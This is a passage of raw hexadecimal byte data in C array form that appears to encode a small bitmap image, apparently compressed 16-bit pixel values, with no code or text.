	0xA6, 0x3B, 0x00, 0x00, 0x80, 0x00, 0xEF, 0x1A, 0x67, 0xB2, 0xA4, 0xC9, 0xC4, 0xC9, 0x04, 0xD2, 
	0x24, 0xDA, 0x64, 0xDA, 0xC4, 0xE2, 0x24, 0xE3, 0x64, 0xE3, 0xA4, 0xE3, 0xC4, 0xE3, 0xC4, 0xE3, 
	0xC4, 0xE3, 0xC4, 0xE3, 0x67, 0xD3, 0xAD, 0x1A, 0x2A, 0x5C, 0xC9, 0x8D, 0x68, 0x7D, 0x08, 0x75, 
	0xE9, 0x74, 0x6A, 0x64, 0xEC, 0x4B, 0xAC, 0x43, 0x4D, 0x2B, 0x4C, 0x33, 0x6B, 0x3B, 0x29, 0x3B, 
	0x06, 0x33, 0xE6, 0x32, 0x26, 0x33, 0x00, 0x01, 0x95, 0xAB, 0x6A, 0xC5, 0xC1, 0xA4, 0xC9, 0xC4, 
	0xC9, 0x04, 0xD2, 0x24, 0xD2, 0x44, 0xDA, 0x84, 0xDA, 0xA4, 0xE2, 0xE4, 0xE2, 0x04, 0xE3, 0x24, 
	0xE3, 0x24, 0xE3, 0x04, 0xE3, 0x26, 0xE3, 0xAC, 0x3A, 0x6B, 0x43, 0x8A, 0x8D, 0x49, 0x7D, 0xAC, 
	0x6C, 0x6E, 0x2B, 0x68, 0xEF, 0x1A, 0x82, 0x0D, 0x23, 0x09, 0x33, 0x00, 0x01, 0x93, 0xCD, 0x3A, 
	0xE5, 0xC1, 0x64, 0xC1, 0x84, 0xC1, 0xC4, 0xC9, 0xE4, 0xD1, 0x04, 0xD2, 0x24, 0xD2, 0x44, 0xDA, 
	0x44, 0xDA, 0x64, 0xDA, 0x64, 0xDA, 0x64, 0xDA, 0x64, 0xDA, 0x85, 0xDA, 0xCA, 0x7A, 0xEC, 0x22, 
	0xCC, 0x6C, 0xAE, 0x3B, 0x60, 0x0E, 0xEF, 0x1A, 0x8F, 0x26, 0xB2, 0x44, 0xB9, 0x64, 0xC1, 0x84, 
	0xC1, 0xA4, 0xC9, 0xC4, 0xC9, 0xE4, 0xC9, 0xE4, 0xD1, 0x04, 0xD2, 0x04, 0xD2, 0x04, 0xD2, 0x04, 
	0xD2, 0x04, 0xD2, 0x24, 0xD2, 0xE8, 0xAA, 0x60, 0x11, 0xEF, 0x1A, 0x8E, 0x69, 0x92, 0x64, 0xB9, 
	0x64, 0xB9, 0x64, 0xC1, 0x64, 0xC1, 0x84, 0xC1, 0x84, 0xC9, 0xA4, 0xC9, 0xC4, 0xC9, 0xC4, 0xC9, 
	0xC4, 0xC9, 0xE4, 0xC9, 0xE4, 0xC9, 0x66, 0xBA, 0xD0, 0x31, 0x04, 0xE0, 0x01, 0x00, 0x00, 0x00, 
	0x00, 0x00, 0x00, 0x8D, 0xEF, 0x1A, 0xCD, 0x52, 0x48, 0x8A, 0x05, 0xC2, 0xA4, 0xB9, 0x64, 0xB9, 
	0x84, 0xB9, 0x84, 0xB9, 0x84, 0xB9, 0x84, 0xB9, 0xA4, 0xB9, 0x06, 0xAA, 0x8B, 0x5A, 0x60, 0x17, 
	0xEF, 0x1A, 0x87, 0xED, 0x3A, 0xAB, 0x5A, 0x6A, 0x72, 0x29, 0x6A, 0x4A, 0x6A, 0xAB, 0x5A, 0xCD, 
	0x3A, 0xF3, 0xCF, 0x01, 0xEF, 0x1A, 0x84, 0xEF, 0x1A, 0xEF, 0x1A, 0xEF, 0x1A, 0xEF, 0x1A, 0x41, 
	0x1E, 0x51, 0x01, 0xB7, 0x02, 0x40, 0x00, 0x32, 0x00, 0x03, 0x49, 0x0B, 0x22, 0x0C, 0x05, 0x40, 
	0x32, 0x4B, 0x4A, 0xFF, 0xFF, 0xC0, 0x2C, 0xEF, 0x1A, 0x84, 0xEF, 0x1A, 0xEF, 0x1A, 0xEF, 0x1A, 
	0xEF, 0x1A, 0x00, 0xF2, 0x85, 0xCF, 0x12, 0xCF, 0x12, 0xCF, 0x12, 0xCF, 0x12, 0xCF, 0x12, 0x0B, 
	0x86, 0xCF, 0x1A, 0xCF, 0x12, 0xCF, 0x12, 0xCF, 0x12, 0xCF, 0x12, 0xCF, 0x1A, 0x09, 0x8B, 0xCF, 
	0x1A, 0xCF, 0x1A, 0xCF, 0x1A, 0xCF, 0x1A, 0xEF, 0x1A, 0xEF, 0x1A, 0xEF, 0x1A, 0xCF, 0x1A, 0xCF, 
	0x1A, 0xCF, 0x1A, 0xCF, 0x1A, 0x14, 0x89, 0xCF, 0x1A, 0xCE, 0x12, 0xCE, 0x12, 0xCE, 0x12, 0xCE, 
	0x12, 0xCE, 0x12, 0xCE, 0x12, 0xCE, 0x12, 0xCF, 0x1A, 0x07, 0x89, 0xCF, 0x1A, 0xCF, 0x12, 0xCE, 
	0x12, 0xCE, 0x12, 0xCE, 0x12, 0xCE, 0x12, 0xCE, 0x12, 0xCE, 0x12, 0xCF, 0x12, 0x06, 0x8F, 0xCF, 
	0x1A, 0xCF, 0x12, 0xCE, 0x12, 0xCE, 0x12, 0xCE, 0x12, 0xCE, 0x12, 0xCF, 0x12, 0xCF, 0x12, 0xCF, 
	0x12, 0xCE, 0x12, 0xCE, 0x12, 0xCE, 0x12, 0xCE, 0x12, 0xCF, 0x12, 0xCF, 0x1A, 0x11, 0x8B, 0xCF, 
	0x1A, 0xCE, 0x12, 0xCE, 0x12, 0xAE, 0x12, 0xAE, 0x12, 0xAE, 0x12, 0xAE, 0x12, 0xAE, 0x12, 0xCE, 
	0x12, 0xCE, 0x12, 0xCF, 0x1A, 0x06, 0x90, 0xCF, 0x12, 0xCE, 0x12, 0xCE, 0x12, 0xAE, 0x12, 0xAE, 
	0x12, 0xAE, 0x12, 0xAE, 0x12, 0xCE, 0x12, 0xCE, 0x12, 0xCF, 0x12, 0xEF, 0x1A, 0xEF, 0x1A, 0xEF, 
	0x1A, 0xEF, 0x1A, 0xCF, 0x1A, 0xCF, 0x12, 0x6E, 0xCE, 0x12, 0x81, 0xCF, 0x12, 0x10, 0x80, 0x10, 
	0xCF, 0x12, 0xCE, 0x12, 0xAE, 0x12, 0xAE, 0x12, 0xAD, 0x12, 0x8D, 0x12, 0xAD, 0x12, 0xAE, 0x12, 
	0xAE, 0x12, 0xCE, 0x12, 0xCF, 0x12, 0xEF, 0x1A, 0xEF, 0x1A, 0xEF, 0x1A, 0xEF, 0x1A, 0xEF, 0x1A, 
	0xCF, 0x12, 0xCE, 0x12, 0xAE, 0x12, 0xAE, 0x12, 0xAD, 0x12, 0x8D, 0x12, 0x8D, 0x12, 0xAD, 0x12, 
	0xAE, 0x12, 0xCE, 0x12, 0xCE, 0x12, 0xCF, 0x1A, 0xEF, 0x1A, 0xEF, 0x1A, 0xEF, 0x1A, 0xCF, 0x12, 
	0xCE, 0x12, 0xCE, 0x12, 0xAE, 0x12, 0xAE, 0x12, 0xAE, 0x12, 0xAE, 0x12, 0xCE, 0x12, 0xCE, 0x12, 
	0xCE, 0x12, 0xAE, 0x12, 0xAE, 0x12, 0xAE, 0x12, 0xAE, 0x12, 0xCE, 0x12, 0xCE, 0x12, 0xCE, 0x12, 
	0x0F, 0x80, 0x12, 0xCF, 0x1A, 0xCE, 0x12, 0xAE, 0x12, 0xAE, 0x12, 0x8D, 0x12, 0x8D, 0x12, 0x8D, 
	0x12, 0x8D, 0x12, 0x8D, 0x12, 0xAE, 0x12, 0xAE, 0x12, 0xCE, 0x12, 0xCF, 0x1A, 0xEF, 0x1A, 0xEF, 
	0x1A, 0xEF, 0x1A, 0xEF, 0x1A, 0xCE, 0x12, 0xCE, 0x12, 0xAE, 0x12, 0x8D, 0x12, 0x8D, 0x12, 0x8D, 
	0x12, 0x8D, 0x12, 0x8D, 0x12, 0xAD, 0x12, 0xAE, 0x12, 0xCE, 0x12, 0xCF, 0x12, 0xEF, 0x1A, 0xEF, 
	0x1A, 0xEF, 0x1A, 0xCE, 0x12, 0xCE, 0x12, 0xAE, 0x12, 0xAE, 0x12, 0xAD, 0x12, 0xAE, 0x12, 0xAE, 
	0x12, 0xAE, 0x12, 0xAE, 0x12, 0xAE, 0x12, 0xAE, 0x12, 0xAE, 0x12, 0xAD, 0x12, 0xAE, 0x12, 0xAE, 
	0x12, 0xCE, 0x12, 0xCE, 0x12, 0xCF, 0x1A, 0x0E, 0x80, 0x13, 0xCF, 0x12, 0xCE, 0x12, 0xAE, 0x12, 
	0xF9, 0xA5, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xF8, 0xA5, 0x8D, 0x12, 0x8D, 0x12, 0xAE, 0x12, 
	0xCE, 0x12, 0xCF, 0x12, 0xEF, 0x1A, 0xEF, 0x1A, 0xEF, 0x1A, 0xCF, 0x12, 0xCE, 0x12, 0xAE, 0x12, 
	0x53, 0x5C, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0x8D, 0x12, 0x8D, 0x12, 0xAE, 0x12, 
	0xCE, 0x12, 0xCE, 0x12, 0xEF, 0x1A, 0xEF, 0x1A, 0xCF, 0x1A, 0xCE, 0x12, 0xCE, 0x12, 0xFF, 0xFF, 
	0xFF, 0xFF, 0xFF, 0xFF, 0xF2, 0x4B, 0xAE, 0x12, 0xAE, 0x12, 0xAE, 0x12, 0xAE, 0x12, 0xFF, 0xFF, 
	0xFF, 0xFF, 0xFF, 0xFF, 0xF2, 0x4B, 0xAE, 0x12, 0xAE, 0x12, 0xCE, 0x12, 0xCF, 0x12, 0x33, 0x54, 
	0x0D, 0x8D, 0xCE, 0x12, 0xCE, 0x12, 0xAE, 0x12, 0xBE, 0xF7, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 
	0xBE, 0xF7, 0x6D, 0x12, 0x8D, 0x12, 0xAE, 0x12, 0xCE, 0x12, 0xCE, 0x12, 0x06, 0x94, 0xF9, 0xA5, 
	0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0x32, 0x5C, 0x8D, 0x12, 0xAD, 0x12, 0xAE, 0x12, 
	0xCE, 0x12, 0xCF, 0x1A, 0xEF, 0x1A, 0xCF, 0x12, 0xCE, 0x12, 0xAE, 0x12, 0xFF, 0xFF, 0xFF, 0xFF, 
	0xFF, 0xFF, 0xF2, 0x4B, 0xAD, 0x12, 0x07, 0x85, 0xAD, 0x12, 0xAE, 0x12, 0xCE, 0x12, 0xCF, 0x12, 
	0xD2, 0x43, 0x0C, 0x80, 0x00, 0xCF, 0x1A, 0xCE, 0x12, 0xAE, 0x12, 0xB1, 0x43, 0xFF, 0xFF, 0xFF, 
	0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0x70, 0x3B, 0x8D, 0x12, 0xAD, 0x12, 0xAE, 0x12, 0xCE, 
	0x12, 0xCF, 0x1A, 0xEF, 0x1A, 0xEF, 0x1A, 0xCE, 0x12, 0xCE, 0x12, 0xAE, 0x12, 0x5D, 0xE7, 0xFF, 
	0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0x97, 0x9D, 0x6D, 0x12, 0x8D, 0x12, 0xAE, 0x12, 0xCE, 
	0x12, 0xCF, 0x12, 0xCF, 0x1A, 0x07, 0x84, 0x8D, 0x12, 0xAD, 0x12, 0xAD, 0x12, 0xAD, 0x12, 0x08, 
	0x6D, 0xEF, 0x1A, 0x80, 0x00, 0xCF, 0x12, 0xCE, 0x12, 0xAE, 0x12, 0x97, 0x95, 0xFF, 0xFF, 0xFF, 
	0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0x36, 0x8D, 0x8D, 0x12, 0x8D, 0x12, 0xAE, 0x12, 0xCE, 
	0x12, 0xCF, 0x12, 0xCF, 0x1A, 0xCF, 0x12, 0xCE, 0x12, 0xAE, 0x12, 0xB1, 0x43, 0xFF, 0xFF, 0xFF, 
	0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFC, 0xD6, 0x6D, 0x12, 0x8D, 0x12, 0xAE, 0x12, 0xCE, 
	0x12, 0xCE, 0x12, 0xCF, 0x12, 0x00, 0x00, 0x80, 0x01, 0xCE, 0x12, 0xCE, 0x12, 0xAE, 0x12, 0xFC, 
	0xD6, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFC, 0xD6, 0x8D, 0x12, 0x8D, 
	0x12, 0xAE, 0x12, 0xCE, 0x12, 0xCE, 0x12, 0xCF, 0x12, 0xCE, 0x12, 0xCE, 0x12, 0xAE, 0x12, 0xF5, 
	0x7C, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0x2F, 0x33, 0x8D, 
	0x12, 0xAD, 0x12, 0xAE, 0x12, 0xCE, 0x12, 0xCF, 0x12, 0xCE, 0x12, 0x1E, 0x80, 0x01, 0xCF, 0x1A, 
	0xCE, 0x12, 0xAE, 0x12, 0x50, 0x33, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0x39, 0xB6, 0xFF, 0xFF, 
	0xFF, 0xFF, 0xFF, 0xFF, 0xCE, 0x22, 0x8D, 0x12, 0xAE, 0x12, 0xAE, 0x12, 0xCE, 0x12, 0xCE, 0x12, 
	0xCE, 0x12, 0xCE, 0x12, 0xAE, 0x12, 0xBB, 0xC6, 0xFF, 0xFF, 0xFF, 0xFF, 0x39, 0xB6, 0xFF, 0xFF, 
	0xFF, 0xFF, 0xFF, 0xFF, 0x94, 0x6C, 0x8D, 0x12, 0xAD, 0x12, 0xAE, 0x12, 0xCE, 0x12, 0xCE, 0x12, 
	0x1F, 0x9E, 0xCF, 0x12, 0xCE, 0x12, 0xAE, 0x12, 0x94, 0x6C, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 
	0xD1, 0x4B, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0x94, 0x6C, 0x8D, 0x12, 0xAD, 0x12, 0xAE, 0x12, 
	0xCE, 0x12, 0xCE, 0x12, 0xCE, 0x12, 0xAE, 0x12, 0xEF, 0x22, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 
	0xD5, 0x7C, 0xFC, 0xD6, 0xFF, 0xFF, 0xFF, 0xFF, 0x39, 0xB6, 0x8D, 0x12, 0x8D, 0x12, 0x00, 0x02, 
	0x8C, 0xCE, 0x12, 0xCE, 0x12, 0xAE, 0x12, 0x5A, 0xB6, 0xFF, 0xFF, 0xFF, 0xFF, 0x5D, 0xE7, 0x6C, 
	0x12, 0xFC, 0xD6, 0xFF, 0xFF, 0xFF, 0xFF, 0xF8, 0xA5, 0x07, 0x89, 0x53, 0x5C, 0xFF, 0xFF, 0xFF, 
	0xFF, 0xFF, 0xFF, 0x70, 0x3B, 0x97, 0x95, 0xFF, 0xFF, 0xFF, 0xFF, 0xBE, 0xF7, 0x00, 0x03, 0x80, 
	0x01, 0xCF, 0x1A, 0xCE, 0x12, 0xAE, 0x12, 0xAE, 0x12, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xF8, 
	0xA5, 0x8D, 0x12, 0x36, 0x8D, 0xFF, 0xFF, 0xFF, 0xFF, 0x5D, 0xE7, 0x8D, 0x12, 0x8D, 0x12, 0xAE, 
	0x12, 0xAE, 0x12, 0xAE, 0x12, 0xAE, 0x12, 0xAE, 0x12, 0xB8, 0x9D, 0xFF, 0xFF, 0xFF, 0xFF, 0xBE, 
	0xF7, 0x6D, 0x12, 0xD1, 0x4B, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xF1, 0x4B, 0x8D, 0x12, 0xAD, 
	0x12, 0xAE, 0x12, 0x10, 0x84, 0x8D, 0x12, 0xAE, 0x12, 0xCE, 0x12, 0xCE, 0x12, 0x0B, 0x9E, 0xCF, 
	0x12, 0xCE, 0x12, 0xAE, 0x12, 0x53, 0x5C, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0x94, 0x6C, 0x8D, 
	0x12, 0x90, 0x43, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0x90, 0x43, 0x8D, 0x12, 0xAD, 0x12, 0xAE, 
	0x12, 0xAE, 0x12, 0xAE, 0x12, 0xAE, 0x12, 0x5D, 0xE7, 0xFF, 0xFF, 0xFF, 0xFF, 0xF8, 0xA5, 0x8D, 
	0x12, 0x8D, 0x12, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0x97, 0x9D, 0x00, 0x05, 0x9F, 0x97, 0x95, 
	0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xEE, 0x22, 0x8D, 0x12, 0x8D, 0x12, 0xBE, 0xF7, 0xFF, 0xFF, 
	0xFF, 0xFF, 0xF5, 0x7C, 0x8D, 0x12, 0x8D, 0x12, 0xAD, 0x12, 0xAE, 0x12, 0xAE, 0x12, 0x2F, 0x33, 
	0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0x94, 0x6C, 0x8D, 0x12, 0x8D, 0x12, 0x9B, 0xC6, 0xFF, 0xFF, 
	0xFF, 0xFF, 0xFC, 0xD6, 0x8D, 0x12, 0x8D, 0x12, 0xAE, 0x12, 0xAE, 0x12, 0x0E, 0x84, 0xF1, 0x4B, 
	0x8D, 0x12, 0xAE, 0x12, 0xAE, 0x12, 0x0C, 0x80, 0x04, 0xCE, 0x12, 0xCE, 0x12, 0xAE, 0x12, 0x5D, 
	0xE7, 0xFF, 0xFF, 0xFF, 0xFF, 0xFC, 0xD6, 0x8D, 0x12, 0x8D, 0x12, 0xAD, 0x12, 0xF9, 0xA5, 0xFF, 
	0xFF, 0xFF, 0xFF, 0x9B, 0xC6, 0x8D, 0x12, 0x8D, 0x12, 0x8D, 0x12, 0xAD, 0x12, 0x8D, 0x12, 0xF5, 
	0x7C, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0x2F, 0x33, 0x8D, 0x12, 0x8D, 0x12, 0xF5, 0x7C, 0xFF, 
	0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0x2F, 0x33, 0x8D, 0x12, 0xAE, 0x12, 0xAE, 0x12, 0xAE, 0x12, 0xAE, 
	0x12, 0x0C, 0x83, 0xD1, 0x4B, 0x8D, 0x12, 0x8D, 0x12, 0x0C, 0x80, 0x02, 0xCF, 0x1A, 0xCE, 0x12, 
	0xAE, 0x12, 0x50, 0x33, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0x36, 0x8D, 0x8D, 0x12, 0xAD, 0x12, 
	0xAE, 0x12, 0x94, 0x6C, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xCE, 0x22, 0x8D, 0x12, 0x8D, 0x12, 
	0x8D, 0x12, 0x8D, 0x12, 0x5A, 0xB6, 0xFF, 0xFF, 0xFF, 0xFF, 0xFC, 0xD6, 0x8D, 0x12, 0xAD, 0x12, 
	0xAD, 0x12, 0xB1, 0x43, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0x94, 0x6C, 0x8D, 0x12, 0xAD, 0x12, 
	0x12, 0x82, 0xAD, 0x12, 0xAE, 0x12, 0x0A, 0x80, 0x02, 0xCF, 0x12, 0xCE, 0x12, 0xAE, 0x12, 0xF5, 
	0x7C, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0x91, 0x43, 0xAD, 0x12, 0xAE, 0x12, 0xAE, 0x12, 0x0F, 
	0x23, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0x33, 0x5C, 0x8D, 0x12, 0x8D, 0x12, 0x8D, 0x12, 0x8D, 
	0x12, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0x97, 0x95, 0xAD, 0x12, 0xAE, 0x12, 0xAE, 0x12, 0xAE, 
	0x12, 0xBE, 0xF7, 0xFF, 0xFF, 0xFF, 0xFF, 0x5A, 0xB6, 0x8D, 0x12, 0x8D, 0x12, 0x0F, 0x84, 0x94, 
	0x6C, 0x8D, 0x12, 0x8D, 0x12, 0x8D, 0x12, 0x0B, 0x80, 0x03, 0xCE, 0x12, 0xCE, 0x12, 0xAE, 0x12, 
	0xBB, 0xC6, 0xFF, 0xFF, 0xFF, 0xFF, 0xBE, 0xF7, 0x8D, 0x12, 0xAE, 0x12, 0xAE, 0x12, 0xAE, 0x12, 
	0xAE, 0x12, 0xFC, 0xD6, 0xFF, 0xFF, 0xFF, 0xFF, 0xF8, 0xA5, 0x8D, 0x12, 0x8D, 0x12, 0x8D, 0x12, 
	0x32, 0x5C, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0x33, 0x5C, 0xAD, 0x12, 0xAE, 0x12, 0xAE, 0x12, 
	0xAE, 0x12, 0x5A, 0xB6, 0xFF, 0xFF, 0xFF, 0xFF, 0xBE, 0xF7, 0x8D, 0x12, 0x8D, 0x12, 0xAD, 0x12, 
	0x07, 0x8C, 0xAD, 0x12, 0xAE, 0x12, 0xAE, 0x12, 0xAD, 0x12, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 
	0x9B, 0xC6, 0x6D, 0x12, 0x8D, 0x12, 0x8D, 0x12, 0x8D, 0x12, 0x09, 0x80, 0x02, 0xCF, 0x1A, 0xCE, 
	0x12, 0xAE, 0x12, 0xEE, 0x22, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0x5A, 0xB6, 0x8D, 0x12, 0xAE, 
	0x12, 0xCE, 0x12, 0xCE, 0x12, 0xCE, 0x12, 0x16, 0x7D, 0xFF, 0xFF, 0xFF, 0xFF, 0x5D, 0xE7, 0x6D, 
	0x12, 0x6D, 0x12, 0x6D, 0x12, 0x97, 0x95, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0x8D, 0x12, 0xAE, 
	0x12, 0xAE, 0x12, 0xCE, 0x12, 0xCE, 0x12, 0xB4, 0x6C, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xF1, 
	0x4B, 0x09, 0x89, 0xAE, 0x12, 0xAE, 0x12, 0xAE, 0x12, 0xAE, 0x12, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 
	0xFF, 0xFF, 0xFF, 0x32, 0x5C, 0x0C, 0x80, 0x05, 0xCF, 0x12, 0xCE, 0x12, 0xAE, 0x12, 0x53, 0x5C, 
	0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0x94, 0x6C, 0xAD, 0x12, 0xAE, 0x12, 0xCE, 0x12, 0xCE, 0x12, 
	0xCE, 0x12, 0xB1, 0x43, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0x70, 0x3B, 0x6C, 0x12, 0x6C, 0x12, 
	0xFC, 0xD6, 0xFF, 0xFF, 0xFF, 0xFF, 0x5A, 0xB6, 0x8D, 0x12, 0xAE, 0x12, 0xCE, 0x12, 0xCE, 0x12, 
	0xCE, 0x12, 0x50, 0x33, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0x97, 0x9D, 0x8D, 0x12, 0x8D, 0x12, 
	0xAD, 0x12, 0x0E, 0x82, 0xBE, 0xF7, 0xF1, 0x4B, 0x0B, 0x80, 0x02, 0xCE, 0x12, 0xCE, 0x12, 0xAE, 
	0x12, 0xF9, 0xA5, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0x2F, 0x33, 0xAE, 0x12, 0xAE, 0x12, 0xCE, 
	0x12, 0xCE, 0x12, 0xCE, 0x12, 0xCE, 0x12, 0x5D, 0xE7, 0xFF, 0xFF, 0xFF, 0xFF, 0xD5, 0x7C, 0x6C, 
	0x12, 0x0E, 0x2B, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xF5, 0x7C, 0xAD, 0x12, 0xAE, 0x12, 0xCE, 
	0x12, 0xCE, 0x12, 0xCE, 0x12, 0xCE, 0x12, 0x5D, 0xE7, 0xFF, 0xFF, 0xFF, 0xFF, 0xFC, 0xD6, 0x08, 
	0x8D, 0x12, 0x54, 0xAE, 0x12, 0xCE, 0x12, 0xCE, 0x12, 0xCE, 0x12, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 
	0xFF, 0xFC, 0xD6, 0xFF, 0xFF, 0xFF, 0xFF, 0xBB, 0xC6, 0xF5, 0x7C, 0x0C, 0x80, 0x00, 0xBE, 0xF7, 
	0xFF, 0xFF, 0xFF, 0xFF, 0xFC, 0xD6, 0x8D, 0x12, 0xAE, 0x12, 0xCE, 0x12, 0xCE, 0x12, 0xCF, 0x12, 
	0xCF, 0x12, 0xCE, 0x12, 0xF9, 0xA5, 0xFF, 0xFF, 0xFF, 0xFF, 0x9B, 0xC6, 0x6C, 0x12, 0x73, 0x6C, 
	0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0x90, 0x3B, 0xAE, 0x12, 0xAE, 0x12, 0xCE, 0x12, 0xCF, 0x12, 
	0xCE, 0x12, 0xCE, 0x12, 0xF9, 0xA5, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xCE, 0x22, 0x07, 0x82, 
	0x12, 0x4C, 0xCE, 0x12, 0x06, 0x86, 0x53, 0x5C, 0xFC, 0xD6, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 
	0xCE, 0x12, 0x07, 0x80, 0x06, 0xCF, 0x1A, 0xCE, 0x12, 0xAE, 0x12, 0xB1, 0x43, 0xFF, 0xFF, 0xFF, 
	0xFF, 0xFF, 0xFF, 0x97, 0x95, 0xAD, 0x12, 0xAE, 0x12, 0xCE, 0x12, 0xCF, 0x12, 0xEF, 0x1A, 0xCF, 
	0x12, 0xCE, 0x12, 0x53, 0x5C, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0x6C, 0x12, 0x39, 0xB6, 0xFF, 
	0xFF, 0xFF, 0xFF, 0x5D, 0xE7, 0x8D, 0x12, 0xAE, 0x12, 0xCE, 0x12, 0xCE, 0x12, 0xCF, 0x12, 0xCF, 
	0x12, 0xCE, 0x12, 0x53, 0x5C, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0x94, 0x6C, 0x8D, 0x12, 0x8D, 
	0x12, 0x0D, 0x86, 0x12, 0x4C, 0x0F, 0x23, 0xB8, 0x9D, 0xFF, 0xFF, 0xFF, 0xFF, 0x8D, 0x12, 0x07, 
	0x80, 0x19, 0xCF, 0x12, 0xCE, 0x12, 0xAE, 0x12, 0x56, 0x8D, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 
	0x33, 0x5C, 0xAD, 0x12, 0xAE, 0x12, 0xCE, 0x12, 0xCF, 0x1A, 0xEF, 0x1A, 0xEF, 0x1A, 0xCE, 0x12, 
	0x0F, 0x23, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0x12, 0x5C, 0xBE, 0xF7, 0xFF, 0xFF, 0xFF, 0xFF, 
	0xF8, 0xA5, 0x8D, 0x12, 0xAE, 0x12, 0xCE, 0x12, 0xCF, 0x12, 0xEF, 0x1A, 0xCF, 0x1A, 0xCE, 0x12, 
	0x0F, 0x23, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xF8, 0xA5, 0x8D, 0x12, 0x8D, 0x12, 0xAD, 0x12, 
	0xAE, 0x12, 0xAE, 0x12, 0xCE, 0x12, 0xCE, 0x12, 0xCE, 0x12, 0xCE, 0x12, 0xCE, 0x12, 0xCF, 0x12, 
	0xCF, 0x1A, 0xCF, 0x1A, 0xCF, 0x12, 0xCF, 0x12, 0xCE, 0x12, 0xCE, 0x12, 0xCE, 0x12, 0x70, 0x33, 
	0x16, 0x7D, 0x6C, 0x12, 0x07, 0x80, 0x1A, 0xCE, 0x12, 0xCE, 0x12, 0xAE, 0x12, 0xFC, 0xD6, 0xFF, 
	0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0x8D, 0x12, 0xAE, 0x12, 0xCE, 0x12, 0xCE, 0x12, 0xEF, 0x1A, 0xEF, 
	0x1A, 0xEF, 0x1A, 0xCF, 0x12, 0xCE, 0x12, 0xBB, 0xC6, 0xFF, 0xFF, 0xFF, 0xFF, 0x39, 0xB6, 0xFF, 
	0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0x94, 0x6C, 0xAD, 0x12, 0xAE, 0x12, 0xCE, 0x12, 0xCF, 0x1A, 0xEF, 
	0x1A, 0xEF, 0x1A, 0xCE, 0x12, 0xCE, 0x12, 0xFC, 0xD6, 0xFF, 0xFF, 0xFF, 0xFF, 0xBE, 0xF7, 0x8D, 
	0x12, 0x8D, 0x12, 0x8D, 0x12, 0xAE, 0x12, 0xAE, 0x12, 0xAE, 0x12, 0xCE, 0x12, 0xCE, 0x12, 0xCE, 
	0x12, 0xCE, 0x12, 0xCF, 0x12, 0xEF, 0x1A, 0xEF, 0x1A, 0xEF, 0x1A, 0xEF, 0x1A, 0xEF, 0x1A, 0xEF, 
	0x1A, 0xCF, 0x1A, 0xCF, 0x1A, 0xCF, 0x12, 0x4C, 0x12, 0xCF, 0x12, 0x08, 0x80, 0x09, 0x50, 0x33, 
	0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0x5A, 0xB6, 0xAD, 0x12, 0xAE, 0x12, 0xCE, 0x12, 0xCF, 0x12, 
